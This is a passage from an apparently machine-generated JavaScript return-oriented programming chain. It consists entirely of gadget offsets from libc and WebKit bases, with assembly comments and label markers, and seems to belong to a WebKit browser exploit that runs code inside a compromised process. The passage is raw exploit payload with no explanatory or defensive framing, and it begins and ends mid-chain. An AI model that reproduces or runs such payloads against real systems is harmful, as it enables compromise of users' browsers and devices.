//sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+206104, //L3482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3482: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+206160, //L3483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3483: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+206296, //L3487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+206280, //L3486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3485: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3486: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3487: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+206432, //L3490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+206464, //L3492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+206416, //L3489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3489: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3490: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3491: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3492: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi 
ropchain+206576, //L3493+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+206568, //L3493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3493: db([0, 0]); // 0x0 set_gadgets([ ropchain+206592, //L3493+24 ropchain+210392, //L3488 //L3494: libc_base+764760, //pop rsi ropchain+206632, //L3495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3495: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3497: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+206752, //L3500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+206736, //L3498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3498: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3500: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+206896, //L3503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+206864, //L3501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+206880, //L3502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3501: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3502: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3503: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+206976, //L3504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L3504: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3506: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+207096, //L3509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+207080, //L3507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3507: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3509: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+207208, //L3510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+207240, //L3512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+207224, //L3511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3510: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3511: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3512: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+207360, //L3513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3513: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3515: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+207480, //L3518 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+207464, //L3516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3516: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3518: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+207656, //L3521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+207672, //L3522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+207624, //L3519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+207640, //L3520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3519: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3520: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3521: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3522: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+207832, //L3526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+207800, //L3524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+207816, //L3525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3523: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3524: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3525: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3526: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+207920, //L3527 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+207936, //L3528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3527: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3528: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+208112, //L3530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+208128, //L3531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208096, //L3529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3529: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3530: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3531: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+208240, //L3533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+208288, //L3536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+208256, //L3534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3533: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3534: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3535: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3536: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop 
rsi ropchain+208400, //L3537+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+208392, //L3537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3537: db([0, 0]); // 0x0 set_gadgets([ ropchain+208416, //L3537+24 ropchain+210360, //L3532 libc_base+764760, //pop rsi ropchain+208456, //L3538 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3538: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3540: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+208576, //L3543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208560, //L3541 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3541: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3543: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+208720, //L3546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208688, //L3544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+208704, //L3545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3544: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3545: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3546: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+208800, //L3547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 
//pop rcx ]); //L3547: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3549: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+208920, //L3552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208904, //L3550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3550: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3552: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+209064, //L3555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209032, //L3553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+209048, //L3554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3553: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3554: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3555: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+209152, //L3557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3556: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3557: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+209208, //L3558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3558: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3560: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi 
ropchain+209288, //L3562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3562: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+209400, //L3563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3563: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3565: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+209520, //L3568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209504, //L3566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3566: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3568: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+209664, //L3571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209632, //L3569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+209648, //L3570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3569: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3570: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3571: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+209744, //L3572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3572: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3573: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L3574: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+209872, //L3576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+209856, //L3575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3576: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+209952, //L3577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3577: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3579: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+210072, //L3582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+210056, //L3580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3580: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3582: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+210152, //L3584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+210184, //L3586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3584: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax 
//L3585: ropchain+210312, //L3583 libc_base+144605 //pop rdi ]); //L3586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+210288, //L3588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+210304, //L3587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3588: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3587: db([0, 0]); // 0x0 //L3583: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+210376, //L3589 //L3532: libc_base+782311, //pop rsp ropchain+210392, //L3590 //L3589: libc_base+782311, //pop rsp ropchain+206592, //L3494 //L3590: //L3488: libc_base+764760, //pop rsi ropchain+210432, //L3591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3591: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3593: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+210552, //L3596 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+210536, //L3594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3594: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3596: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+210664, //L3597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+210696, //L3599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+210680, //L3598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3597: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3598: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3599: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+210800, //L3600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+210816, //L3601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3600: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3601: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+210936, //L3602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+210920, //L3603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3603: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3602: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+211024, //L3605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+211008, //L3604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3604: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3605: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+764760, //pop rsi ropchain+211128, //L3606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+211144, //L3607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3606: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3607: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+211264, //L3608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+211248, //L3609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3609: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3608: db([0, 0]); // 0x0 //__ntoa_format: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+211336, //L3611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L3611: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+211432, //L3612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+211464, //L3615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L3612: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3614: db([96, 0]); // 0x60 set_gadget(webkit_base+568675,); //pop r8 //L3615: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+211568, //L3618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+211552, //L3616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3616: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3618: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+211744, //L3621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+211760, //L3622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+211712, //L3619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+211728, //L3620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3619: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3620: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3621: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3622: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+211856, //L3624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+211840, //L3623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3623: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3624: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3625: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3626: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L3627: 
db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+212056, //L3629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3629: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+212112, //L3630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3630: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+212248, //L3634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+212232, //L3633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 